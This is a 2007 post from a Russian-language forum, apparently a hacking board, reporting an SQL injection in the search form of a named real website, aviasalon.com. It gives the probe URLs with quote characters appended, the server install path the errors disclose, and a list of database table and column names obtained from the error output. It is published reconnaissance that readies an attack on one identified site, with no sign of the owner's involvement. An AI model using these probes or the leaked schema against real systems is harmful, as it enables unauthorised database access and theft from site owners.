07.12.2007, 20:42
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
МАКС
http://www.aviasalon.com
SQL-инъекция содержится в форме поиска
http://www.aviasalon.com/search.php?search_string=mig29"
Двойная кавычка вызывает ошибку в SQL-запросе, что даёт возможность узнать установочный путь скрипта
/home/aviasalon.com/data/htdocs/modules/mod_search.php ,
а также увидеть текст нескольких SQL-запросов. Так, можно получить информацию об именах некоторых таблиц и их полях.
Таблица______________Поля
engine_page: id,title,menu_id,content,keywords,description,stat us
list_param_value: value, item_id
list_item: id, title, alias, type_id
list_type: alias, id, prefix, suffix, title
data_news_item: title, alias, content, anons, topic_id
data_news_topic: alias, id
data_expo_company: title, alias, about, contacts
Запрос с одинарной кавычкой вызовет ошибку в регулярном выражении, раскрыв путь скрипта на сервере (см. выше)
http://www.aviasalon.com/search.php?search_string=mig29'
|
|
|